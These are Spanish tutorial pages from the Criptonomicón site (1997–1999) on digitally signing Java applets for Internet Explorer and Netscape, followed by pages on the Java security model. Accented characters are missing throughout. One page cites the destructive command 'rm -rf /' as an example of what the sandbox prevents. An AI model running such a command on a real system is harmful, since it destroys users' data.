Este comando crea una pareja de claves, pblica y privada, y un fichero de peticin
de certificado (Gonzalo.cert), a partir de la clave pblica y la informacin de la
compaa (campo CN). Para ello emplea la clave de registro de Windows
claveGonzalo. Si no se le suministra ninguna, makecert la crea.
Sin embargo, este certificado no sirve para firmar cdigo. En su lugar se necesita un

file:///C|/TEMP/criptonomicon/criptonomicon/java/ie.html (1 of 4) [25/10/2000 02:31:41 p.m.]

Cmo firmar applets de Java

Certificado de Productor de Software (Software Publisher Certificate, SPC), el cual


debe obtenerse de una AC a la que se enva este certificado recin generado para que
lo autentique y lo firme. En su defecto, y slo con fines de prueba, existe otra
herramienta del SDK que permite transformar el certificado anterior en uno vlido,
de la siguiente forma:
cert2spc Gonzalo.cert Gonzalo.spc
Ahora ya se puede utilizar este certificado, Gonzalo.spc, para firmar cdigo, con
prestaciones similares a las que poseera si hubiera procedido de una AC.

Paso 2: Crear el CAB


La firma basada en Authenticode funciona con ficheros armario (Cabinet, CAB). Los
ficheros CAB constituyen simplemente una manera de compactar varios ficheros en
uno solo en un formato que pueda entender IE. Para archivar varios ficheros se
utiliza la herramienta cabarc. Por ejemplo, para comprimir los ficheros fich1.class y
fich2.class en uno solo se utilizara:
cabarc n fich.cab fich1.class fich2.class
donde la opcin n indica que se quiere crear un nuevo fichero. Tambin se pueden
utilizar metacaracteres, incluir subdirectorios, etc.
Supongamos que se dispone de un applet llamado abednego.java, capaz de escapar
del recinto de seguridad y leer propiedades del sistema y escribir ficheros. Una vez
compilado, se puede crear un fichero armario de la siguiente forma:
cabarc n abednego.cab abednego.class

Paso 3: Firmar el CAB


El SDK incorpora la herramienta signcode para firmar cdigo. En este paso conviene
decidir qu nivel de seguridad se le desea asignar, ya que en funcin de dicho nivel y
de la configuracin de las zonas de seguridad en el navegador del usuario, el
resultado ser que se presenten ms o menos ventanas pidiendo al usuario
confirmacin antes de permitir que el applet escape de los confines del recinto de
seguridad.
El comando para firmar el cdigo es:
signcode -spc Gonzalo.spc -k claveGonzalo abednego.cab
Para confirmar que todo el proceso se ha realizado correctamente, se puede ejecutar
el comando:
chkjava abednego.cab
o tambin:
chktrust abednego.cab
file:///C|/TEMP/criptonomicon/criptonomicon/java/ie.html (2 of 4) [25/10/2000 02:31:41 p.m.]

Cmo firmar applets de Java

Por defecto, signcode requiere permisos totales, como se ha podido comprobar al


ejecutar el comando chkjava. Si se desea, se puede aadir informacin de permisos
de Java a la firma para controlar ms finamente el tipo de recursos a los que tendr
acceso el applet, usando la opcin -j JavaSign.dll de signcode, con la siguiente
sintaxis:
signcode [opciones] -j JavaSign.dll [-jp nivel] [ms opciones]
donde nivel es opcional y ser uno de los seis siguientes: Low, Medium, High, Lowx,
MediumX, HighX. Por defecto, el nivel de seguridad ser Lowx.
Si se desea configurar los permisos an ms granularmente, se pueden utilizar
ficheros de configuracin, con extensin .ini. Si despus de la opcin -jp no se
incluye uno de los seis nombres anteriores, signcode entender que lo que venga a
continuacin es el nombre de un fichero .ini con la configuracin. Para confeccionar
estos ficheros de configuracin existe una herramienta grfica incluida en el SDK,
llamada PIniEdit. A continuacin se muestra un ejemplo de un fichero tal, que
permitira leer y escribir todos los ficheros del directorio c:\temp, excepto los
documentos de Word (extensin .doc):
[com.ms.security.permissions.FileIOPermission]
Version=2
IncludeRead=c:\temp\*.*;
IncludeWrite=c:\temp\*.*;
ExcludeRead=c:\temp\*.doc;
Junto con PIniEdit se distribuye un fichero con instrucciones precisas sobre su uso.
Se puede ampliar la informacin respecto a todos los dems aspectos de la firma de
cdigo escrito en Java en la pgina de Microsoft.

Paso 4: Incrustar el CAB en la pgina web


Ya slo queda incluir las etiquetas correctas para que se visualice el applet sin
problemas, lo cual exige variar ligeramente el formato de la etiqueta <applet>
convencional:
<applet code="abednego.class"> <param name="cabbase" value="abednego.cab">
</applet>
Es importante eliminar el fichero abednego.class original del directorio, ya que en
caso contrario el navegador lo cargara, en lugar del firmado. El applet ya est listo
para ejecutarse en Internet Explorer. En adelante, cuando el visitante a su web cargue
la pgina donde se aloja el applet firmado, le aparecer una advertencia de seguridad
solicitndole su aprobacin para instalarlo y ejecutarlo. Si el visitante acepta, el
applet se ejecutar para acceder sin restricciones a todos aquellos recursos que se
solicitaron en el fichero .ini de permisos creado mediante la herramienta PIniEdit y
utilizado en el proceso de firmado. Puede examinar con ms detalle los permisos
solicitados, para decidir si aprobar o no su ejecucin. Si el visitante deniega los
file:///C|/TEMP/criptonomicon/criptonomicon/java/ie.html (3 of 4) [25/10/2000 02:31:41 p.m.]

Cmo firmar applets de Java

permisos, entonces el applet no se ejecuta en absoluto. Tambin puede comprobar el


certificado si as lo requiere.

Ejemplos de applets para Microsoft Internet Explorer


Puedes ver ejemplos operativos con su cdigo fuente disponible:
Renegado: esta applet gozar de los privilegios necesarios para acceder a las
propiedades del sistema y al disco.
Almacenamiento en cliente: esta applet utiliza la clase ClientStore para
acceder a un rea temporal de espacio de disco.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/java/ie.html (4 of 4) [25/10/2000 02:31:41 p.m.]

Cmo firmar applets de Java

Qu es Java

Barreras de seguridad

Prohibido

Agujeros

Lneas futuras

Consejos

Recursos

Cmo firmar applets para Netscape


Lo primero que se necesita es hacerse con las herramientas
necesarias. En primer lugar, hay que notar que para poder firmar
un applet que va a acceder a recursos restringidos, como el
sistema de ficheros, propiedades del sistema o conexiones de red,
se necesita alterar el cdigo fuente del applet, incluyendo
llamadas a ciertas funciones para garantizar los privilegios
requeridos. Estas clases constituyen lo que se denomina el
Netscape Java Capabilities API. Por otro lado, se requiere la
herramienta de firmado, conocida como SignTool 1.1. Una vez
armados con este arsenal, se puede proceder ya a firmar applets,
siguiendo los siguientes pasos.

Pasos generales

Internet Explorer

Netscape

Inconvenientes

Comparacin

Paso 1: Crear un certificado para firmar applets


El primer paso consiste tambin en adquirir un certificado adecuado de una autoridad
de certificacin. Hay que asegurarse de que la autoridad elegida emite certificados
que permitan firmar software, los de clase 2 para uso personal y los de clase 3 para
aplicaciones comerciales. VeriSign puede ser de nuevo la eleccin adecuada. Se
pueden consultar ms autoridades propuestas por Netscape, aptas para certificar sus
productos.
En este caso, y como slo se necesita para hacer pruebas, se crear un certificado de
prueba, que es gratis, utilizando la citada herramienta SignTool 1.1.
Antes de instalar claves y certificados nuevos en las bases de datos de Netscape
Communicator, es imprescindible crear una contrasea para acceder a la base de
datos. Para hacerlo, se pulsa el botn de Seguridad en la barra de herramientas de
Communicator, se elige Passwords y despus se pulsa el botn de Establecer
Passwords para crearlo.
Otro aviso importante es que para ejecutar SignTool se debe cerrar antes todas las
ventanas abiertas de Communicator, ya que en caso contrario se corre el riesgo de
corromper las bases de datos de claves y certificados.
Para generar un certificado de prueba se utiliza la opcin -G seguida de un nombre y
la opcin -d para indicar el directorio donde se encuentra la base de datos de
certificados (el fichero cert7.db) y claves (el fichero key3.db) de Communicator. Por

file:///C|/TEMP/criptonomicon/criptonomicon/java/nc.html (1 of 5) [25/10/2000 02:31:41 p.m.]

Cmo firmar applets de Java

ejemplo, para crear un certificado para Gonzalo del CSIC, se puede escribir lo
siguiente (en negrita aparece lo que se debe introducir en la lnea de comandos):
signtool -G gonzalo -d c:\netscape\users\gonzalo
using certificate directory: c:\netscape\users\gonzalo
Enter certificate information. All fields are optional. Acceptable
characters are numbers, letters, spaces, and apostrophes.
certificate common name: Certificado para pruebas
organization: CSIC
organization unit: TIC
state or province: Madrid
country (must be exactly 2 characters): ES
username: gonzalo
email address: gonzalo@iec.csic.es
Enter Password or Pin for "Communicator Certificate DB": [no se produce eco]
generated public/private key pair
certificate request generated
certificate has been signed
certificate "gonzalo" added to database
Exported certificate to x509.raw and x509.cacert.
Si en el paso anterior se especific la opcin -d junto con el camino donde se
encuentra la base de datos de claves y de certificados de Communicator, la base ya
ha quedado automticamente actualizada. La prxima vez que se arranque
Communicator, si se pulsa el botn de Seguridad de la barra de herramientas, en
Certificados y a continuacin en Propios se comprobar que aparece el recin creado.
Se puede comprobar que el certificado se ha instalado correctamente tambin
mediante signtool, con la opcin -l:
signtool -l
using certificate directory: .
Object signing certificates
--------------------------------------gonzalo
Issued by: gonzalo (Certificado para pruebas)
Expires: Sun Apr 11, 1999
--------------------------------------For a list including CA's, use "signtool -L"
Con este certificado ya se est listo para firmar applets. Ahora bien, no basta con
firmarlos. Para que los usuarios puedan ejecutar applets firmados es necesario que
instalen en su versin de Communicator el certificado que se acaba de generar. Si se
hace un listado del directorio donde se est trabajando, se observar que signtool ha
creado dos ficheros automticamente, x509.cacert y x509.raw. El primero de ellos
contiene el certificado en formato base64. Para que quede a disposicin de cualquiera
que lo necesite, se seguirn los siguientes pasos:
Crear un enlace al fichero x509.cacert en una pgina Web
file:///C|/TEMP/criptonomicon/criptonomicon/java/nc.html (2 of 5) [25/10/2000 02:31:41 p.m.]

Cmo firmar applets de Java

Por ejemplo, puede aadir la siguiente lnea en HTML a su pgina personal


para que los visitantes que deseen ejecutar sus applets sepan dnde obtener su
certificado:
Primero debes instalar mi <a href="x509.cacert">certificado</a>.
Asegurarse de que el servidor Web exporta el fichero como MIME-type
application/x-x509-ca-cert
Los servidores de Netscape estn configurados as por defecto y tambin
algunos servidores Unix. No as el Internet Information Server de NT, por lo
que habr que configurarlo para que asocie ese tipo MIME a la extensin
.cacert.
Instalar el certificado
Una vez que esos pasos han sido seguidos, basta con pinchar en el enlace
anterior para que automticamente se lance el proceso de instalacin de
certificados de Netscape. Siguiendo las instrucciones del proceso, muy
sencillo, se instalar el certificado en el navegador del usuario, que podr a
partir de ahora ejecutar correctamente todos los applets firmados con este
certificado.

Paso 2: Crear un applet con privilegios


Antes de traspasar los lmites del recinto de seguridad, los applets tienen que pedir
permiso educadamente. La manera como se consigue es mediante el API de
capacidades. Cada vez que un applet quiere efectuar alguna accin restringida, debe
pedir permiso al navegador para ver si ste se lo concede, para lo cual se sirve de las
funciones contenidas en esta API. Cuando el applet le pide permiso al navegador,
ste busca en su base de datos si existe una entrada para el firmante del applet y si la
accin le est permitida. Caso de no existir ninguna entrada, el navegador presenta
una ventana pidiendo confirmacin antes de conceder el permiso. El usuario decide
si garantiza o deniega el permiso, con la posibilidad de almacenar la decisin en la
base de datos para futuras referencias.
La forma de modificar el applet consiste en preceder todas las llamadas a recursos
protegidos de una llamada al gestor de privilegios.
Por ejemplo, para solicitar privilegios antes de leer propiedades del sistema, la
funcin en Java que lee los privilegios ir precedida de:
PrivilegedManager.enablePrivilege("UniversalPropertyRead");
Para leer/crear/escribir ficheros, se precedera el bloque de funciones correspondiente
por:
PrivilegedManager.enablePrivilege("UniversalFileAccess");
Y as con distintas llamadas para cada tipo de recurso. Una vez terminadas las
operaciones que requieren privilegios, constituye una buena prctica revocar los
privilegios concedidos, utilizando la siguiente funcin:

file:///C|/TEMP/criptonomicon/criptonomicon/java/nc.html (3 of 5) [25/10/2000 02:31:41 p.m.]

Cmo firmar applets de Java

PrivilegeManager.revertPrivilege("UniversalPropertyRead");
Puedes consultar el listado completo de los recursos que se pueden acceder. La
documentacin completa sobre este API donde se detalla su funcionamiento se puede
obtener gratuitamente.
El mayor inconveniente de este enfoque es que exige la modificacin del applet y
adems, como consecuencia de los cambios introducidos, no funcionar ya en ningn
otro navegador, tirando por tierra la filosofa de Java de "Escribir una vez, ejecutar
en cualquier sitio".

Paso 3: Firmar y empaquetar los ficheros con las


clases
En vez de firmar el fichero con todas las clases compactadas, como se haca en el
caso de IE, primero se crea un directorio al que se copian todas las clases que
componen el applet y a continuacin se firma el directorio utilizando la herramienta
SignTool. La propia herramienta se encarga de generar un fichero comprimido con
todas las clases y dems ficheros que se hayan copiado en el directorio. Este fichero
recibe el nombre de Archivo Java (JAR). En versiones anteriores esta herramienta se
llamaba zigbert, pero con la versin actual de SignTool ha quedado obsoleta.
En el caso supuesto de que se quiera firmar la clase abednego.class, se copiar a un
directorio al que se llamar abednego y se ejecutar el programa SignTool, pasndole
la clave del certificado almacenada en la base de datos de Communicator, que se
acaba de generar en el paso 1. Por ejemplo:
signtool -k gonzalo -Z abednego.jar abednego
using certificate directory: .
Generating abednego/META-INF/manifest.mf file..
--> abednego.class
adding abednego/gon.txt to abednego.jar...(deflated 0%)
Generating zigbert.sf file..
Aqu pide el password:
Enter Password or Pin for "Communicator Certificate DB": [no se produce eco]
Si se ha introducido correctamente, contina:
adding abednego/META-INF/manifest.mf to abednego.jar...(deflated 14%)
adding abednego/META-INF/zigbert.sf to abednego.jar...(deflated 27%)
adding abednego/META-INF/zigbert.rsa to abednego.jar...(deflated 43%)
tree "abednego" signed successfully
Ahora ya est disponible el fichero abednego.jar para distribuirlo con su firma
incorporada. Se puede verificar que el proceso se ha realizado correctamente
utilizando la opcin -v:

file:///C|/TEMP/criptonomicon/criptonomicon/java/nc.html (4 of 5) [25/10/2000 02:31:41 p.m.]

Cmo firmar applets de Java

signtool -v abednego.jar
using certificate directory: .
archive "abednego.jar" has passed crypto verification.
status path
------------ ------------------verified abednego.class

Paso 4: Incrustar el JAR en la pgina web


En este caso la etiqueta <applet> tambin cambia ligeramente para permitir la
insercin del archivo JAR:
<applet
code=abednego.class
archive=abednego.jar
width=320
height=200>
</applet>
Es importante eliminar el fichero abednego.class original del directorio, ya que en
caso contrario el navegador lo cargara, en lugar del firmado. Ahora ya se puede
visualizar correctamente el applet en Communicator. En cada ocasin en la que el
applet necesite acceder a un recurso protegido, al usuario se le presentar una
ventana de advertencia, en la que se le informa de los permisos que est solicitando
ese applet, acompaados de una estimacin del riesgo potencial derivado de su
concesin. Siempre y cuando no se active la casilla para recordar la decisin, esta
ventana aparecer cada vez que el applet intente acceder de nuevo a ese recurso. En
la figura se muestra la informacin del certificado que el usuario puede comprobar
pulsando el botn Certificado en la ventana anterior. Obsrvese cmo los datos
corresponden a los que se introdujeron en el paso 1.

Ejemplos de applets para Netscape Communicator


Puedes ver un ejemplo operativo con su cdigo fuente disponible en:
Renegado: esta applet gozar de los privilegios necesarios para acceder a las
propiedades del sistema y al disco.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/java/nc.html (5 of 5) [25/10/2000 02:31:41 p.m.]

Cmo firmar applets de Java

Qu es Java

Barreras de seguridad

Prohibido

Agujeros

Lneas futuras

Consejos

Recursos

No todo son ventajas


A pesar de que la firma digital de applets supera las drsticas
Pasos generales
limitaciones impuestas por el modelo del recinto de seguridad de
Java, se presentan varios obstculos para su implantacin:
Internet Explorer
Los distintos navegadores utilizan distintos esquemas de
Netscape
firmado, mutuamente incompatibles. Este inconveniente se
puede superar creando applets firmadas para los dos
Inconvenientes
navegadores y detectar en la pgina qu tipo de navegador
se utiliza, presentndole un applet u otro, aunque aumenta
Comparacin
la complejidad.
Las herramientas de firmado son bastante crpticas y complicadas de utilizar.
La nica solucin consiste en que el desarrollador se arme de paciencia y
trabaje con precisin.
Los usuarios pueden verse abrumados por tantas ventanas cuyo significado a
menudo no comprenden con claridad. Debera explicrseles con sencillez qu
permisos necesita de verdad un applet para hacer qu cosa y requerir el
mnimo de interaccin por su parte. Cuanto ms granular sea el acceso a los
recursos, menor ser el posible dao en caso de que el usuario garantice ms
permisos de los debidos.
Por ltimo, es importante resaltar que el hecho de que un applet est firmado
no implica que sea seguro, sino simplemente que se puede identificar al autor.
En el caso de un autor desconocido, persiste la incertidumbre al decidir si se le
concedern o no privilegios para acceder a recursos restringidos en la mquina
del usuario.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/java/inconvenientes.html [25/10/2000 02:31:42 p.m.]

Cmo firmar applets de Java

Comparacin de ambos mtodos


Funcin
Mecanismo de
envo
Firma
Creacin de
certificados de
prueba
Gestin de
certificados en el
navegador del
usuario

Netscape

Microsoft

Ficheros JAR firmados

Ficheros CAB firmados

SignTool 1.1

Java SDK 3.1

Soportado mediante SignTool.

Soportado mediante Makecert y


Cert2spc.

Utilidades de gestin de claves y


certificados estndar de
Communicator. Mecanismo bien
documentado para instalar
Autoridades de Certificacin de
confianza y claves personales.

Utilidades de gestin de claves y


certificados estndar de Internet
Explorer. Mecanismo para actualizar
Autoridades de Certificacin de
confianza mal documentado.

La utilidad de firmado, signcode,


El programador define los privilegios decide los privilegios requeridos
Solicitud de
que se solicitan llamando a los
como parte de la firma del CAB. Se
privilegios
mtodos del PrivilegeManager. Exige ayuda de editor de ficheros de
modificar el cdigo fuente del applet. permisos PIniEdit. No exige modificar
el cdigo fuente del applet.
Se le pregunta al usuario en funcin
Se le pregunta al usuario la primera de la zona de seguridad
Configuracin de
vez que se solicitan privilegios. Los preseleccionada y su configuracin.
los permisos
permisos garantizados pueden ser
El administrador puede definir un
garantizados
perpetuos o por sesin.
esquema de permisos ms
complicado.
Se puede autorizar el acceso para
El usuario concede permiso de
cada tipo de recurso por separado y acceso a los recursos solicitados
Granularidad
slo cuando va a ser requerido. Si se antes de que se ejecute el applet. Si
niega un permiso, el applet contina se deniega el permiso, el applet ya
funcionando.
no se ejecuta.
Volver a la pgina de firmas digitales.
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre privacidad, por favor consulte la
declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de visitas. Para contribuir al Criptonomicn, lea la pgina de
contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/java/comparacion.html [25/10/2000 02:31:42 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/images/advertencianc.gif

file:///C|/TEMP/criptonomicon/criptonomicon/images/advertencianc.gif [25/10/2000 02:31:42 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/images/certificadonc.gif

file:///C|/TEMP/criptonomicon/criptonomicon/images/certificadonc.gif [25/10/2000 02:31:42 p.m.]

Renegado de Netscape

Suscripcin gratis

Intimidad?

Renegado de Netscape
Artculos

Seguridad

Linux

Navegacin segura

Esta es una applet para Netscape Communicator que intentar leer propiedades del
sistema y acceder a disco. Primero debes instalar mi certificado.
Para que la applet funcione correctamente debes crear antes un fichero en el disco c:
en el directorio raz llamado test.txt, ya que la applet intentar abrir un fichero
con ese nombre en esa ubicacin. El contenido del fichero puede ser cualquiera. Una
vez que lo hayas creado, tendrs que cerrar las sesiones abiertas con Netscape y
volver a esta pgina y entonces ya s se leer.

Control de acceso

Aqu est el cdigo fuente.


CGI

Java

JavaScript

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/java/ncrenegado.html (1 of 2) [25/10/2000 02:31:43 p.m.]

Renegado de Netscape
Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/java/ncrenegado.html (2 of 2) [25/10/2000 02:31:43 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/images/advertenciaie.gif

file:///C|/TEMP/criptonomicon/criptonomicon/images/advertenciaie.gif [25/10/2000 02:31:43 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/images/alerta.gif

file:///C|/TEMP/criptonomicon/criptonomicon/images/alerta.gif [25/10/2000 02:31:43 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/images/certificadoie.gif

file:///C|/TEMP/criptonomicon/criptonomicon/images/certificadoie.gif [25/10/2000 02:31:43 p.m.]

Cmo firmar applets de Java: Renegado

Suscripcin gratis

Intimidad?

Renegado de Microsoft
Artculos

Seguridad

Linux

Navegacin segura

Para que la applet funcione correctamente debes crear antes un fichero en el disco c:
en el directorio raz llamado test.txt, ya que la applet intentar abrir un fichero
con ese nombre en esa ubicacin. El contenido del fichero puede ser cualquiera. Una
vez que lo hayas creado, pulsa el botn de Actualizar y entonces s se leer. Debes
tener Java desactivado. Si quieres ver cmo funciona la firma digital, actvalo! Aqu
est el cdigo fuente y el fichero de configuracin de permisos.

Control de acceso
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
CGI

Java

Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/java/ierenegado.html (1 of 2) [25/10/2000 02:31:44 p.m.]

Cmo firmar applets de Java: Renegado


Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/java/ierenegado.html (2 of 2) [25/10/2000 02:31:44 p.m.]

Almacenamiento en cliente

Suscripcin gratis

Intimidad?

Almacenamiento en cliente
Artculos

Esta applet utiliza el rea de almacenamiento de cliente para realizar sus actividades.
Seguridad

Aqu est el cdigo fuente y el fichero de configuracin de permisos.


Linux

Navegacin segura

Control de acceso

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

CGI

Java

JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/java/almacencliente.html (1 of 2) [25/10/2000 02:31:44 p.m.]

Almacenamiento en cliente
Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/java/almacencliente.html (2 of 2) [25/10/2000 02:31:44 p.m.]

Evolucin del modelo de seguridad de Java

Qu es Java

Barreras de seguridad

Prohibido

Agujeros

Cmo firmar applets

Consejos

Recursos

Evolucin del modelo de seguridad de


Java
Futuro
En vista de las restricciones impuestas por el modelo de seguridad
de Java, muchos desarrolladores de software se encuentran ante la
JDK 1.1
impotencia de escribir aplicaciones realmente tiles, puesto que se
JDK 1.2
les niega la capacidad de leer/escribir en disco o de abrir
conexiones a otras mquinas. Si se quiere que las applets sean algo ms que dibujos
animados para realzar el impacto visual de una pgina y lleguen a convertirse en
verdaderas aplicaciones productivas y realmente tiles, los usuarios de la aplicacin
Java necesitan garantizarle el acceso a los recursos, y antes de concederle estos
privilegios, necesitan de un mecanismo que les permita saber de dnde (de quin)
proviene la applet a la que le van a permitir acceso a su sistema.

La evolucin lgica del modelo anterior lleg a travs del JDK 1.1.x, al introducir el
concepto de applet firmada. En este modelo extendido, una applet con firma digital
vlida se trata como si fuera cdigo de confianza cargado localmente siempre y
cuando la firma digital sea reconocida como de confianza por el sistema final que
recibe la applet. Estas applets firmadas, junto con sus firmas, son enviadas en
formato JAR (Java Archive). Se puede ver una representacin grfica de este nuevo
modelo en la simptica figura de Li Gong.
La primera edicin de Seguridad en Java, disponible con el JDK 1.1, contena APIs
para:
Firmas digitales: algoritmos de firma digital, como DSA. Su funcionalidad
inclua generacin de pares de clave pblica/privada, as como firma y
verificacin de datos digitales arbitrarios.
Resmenes de mensajes: resmenes de mensajes criptogrficamente seguros,
tales como MD5 y SHA-1. Estos algoritmos, tambin llamados algoritmos de
hash unidireccional, son tiles para producir "resmenes digitales" de los
datos, usados frecuentemente en firmas digitales y otras aplicaciones que
requieren identificadores nicos e infalsificables de datos digitales.
Gestin de claves: conjunto de abstracciones para gestionar principales
(entidades tales como usuarios individuales o grupos), sus claves y sus

file:///C|/TEMP/criptonomicon/criptonomicon/java/evolucion.html (1 of 2) [25/10/2000 02:31:44 p.m.]

Evolucin del modelo de seguridad de Java

certificados. Permite a las aplicaciones disear sus propios sistemas de gestin


de claves e interoperar con otros sistemas a alto nivel.
Listas de control de acceso: conjunto de abstracciones para gestionar
principales y sus permisos de acceso.

Asimismo, se desarroll de forma paralela una Extensin Criptogrfica de Java (JCE)


con APIs que incluan algoritmos para cifrado y descifrado de datos.
Si ests interesado, puedes obtener el kit de desarrollo de Java, versin 1.1.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/java/evolucion.html (2 of 2) [25/10/2000 02:31:44 p.m.]

Nueva arquitectura de seguridad de Java

Qu es Java

Barreras de seguridad

Prohibido

Agujeros

Cmo firmar applets

Consejos

Recursos

Nueva arquitectura de seguridad de Java


Futuro
La nueva arquitectura de seguridad del JDK 1.2 se introdujo con
el fin de superar limitaciones del modelo anterior:
JDK 1.1
JDK 1.2
Control de acceso de grano fino: libera al programador de la
carga de extender y adaptar las clases SecurityManager y ClassLoader.
Poltica de seguridad fcilmente configurable: permite a los desarrolladores y
usuarios configurar polticas de seguridad sin necesidad de programar una
lnea.
Estructura de control de acceso fcilmente extensible: acaba con la necesidad
de aadir nuevos mtodos a la clase SecurityManager para crear nuevos
permisos de acceso, ya que permite hacerlo automticamente.
Extensin de las comprobaciones de seguridad a todos los programas en Java,
incluyendo tanto aplicaciones como applets: el cdigo local ya no es de
confianza, sino que tambin est sujeto a los controles de seguridad, aunque
estas polticas pueden flexibilizarse.

La piedra angular de esta nueva arquitectura la constituye el dominio de proteccin,


mecanismo para agrupar y aislar unidades de proteccin, a los cuales se les asigna
una serie de permisos de acceso a recursos. De esta manera, cada clase pertenece a
un nico dominio, que tendr sus permisos asignados. Antes de acceder a un objeto,
se comprueba la poltica para ver qu permisos tiene y si puede accederlo.
Entre otras caractersticas aade soporte para SSL v3.0 y una nueva extensin
criptogrfica para Java. La verificacin de firmas digitales soporta completamente el
procesamiento de los certificados X.509v3.
Si ests interesado, puedes obtener el kit de desarrollo de Java, versin 1.2.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/java/arquitectura.html [25/10/2000 02:31:45 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/images/jdk11.jpg

file:///C|/TEMP/criptonomicon/criptonomicon/images/jdk11.jpg [25/10/2000 02:31:45 p.m.]

Robo de informacin

Qu es Java

Barreras de seguridad

Prohibido

Lneas futuras

Robo de informacin

Cmo firmar applets

Consejos

Recursos

En principio, todos los ordenadores contienen alguna informacin


de inters para alguien. Es cierto que no siempre tendr el mismo
valor, pero siempre puede existir alguien interesado en
conseguirla. Por consiguiente, uno de los ataques ms comunes
est dirigido a extraer informacin confidencial de un sistema.

Ataques
Robo de informacin
Destruccin de
informacin
Robo de recursos
Denegacin de servicio

Con el fin de que ninguna applet de Java pudiera hacerlo, se


Enmascaramiento
decidi que no tendran acceso al sistema de ficheros, lo que
Engao
significa que no se puede leer, escribir, borrar, renombrar, o listar
Lnea Maginot
ficheros. Adems se les neg el acceso al sistema, para que no
puedieran ejecutar comandos que manipulen ficheros (pensemos en el famoso rm
-rf / de Unix) ni acceder a propiedades del sistema que contengan informacin
confidencial (nombres de usuario, contraseas, versiones de programas, etc.) o que
pudiera revelar debilidades.

En concreto, el gestor de seguridad define los siguientes mtodos pblicos de la clase


SecurityManager para evitar estos ataques:
Mtodo
checkDelete(String)

Descripcin
Comprueba si se puede borrar el fichero de
nombre String.
Comprueba si se puede leer el fichero
checkRead
(FileDescriptor)
indicado por FileDescriptor.
Comprueba si se puede leer el fichero de
checkRead(String)
nombre String.
checkRead(String, Object) Comprueba si se puede leer el fichero en el
contexto de seguridad actual.
Comprueba si se puede escribir el fichero
checkWrite
(FileDescriptor)
indicado por FileDescriptor.

file:///C|/TEMP/criptonomicon/criptonomicon/java/roboinfo.html (1 of 2) [25/10/2000 02:31:45 p.m.]

Robo de informacin

checkWrite(String)
checkFileDialog()
checkExec(String)
checkExit(int)

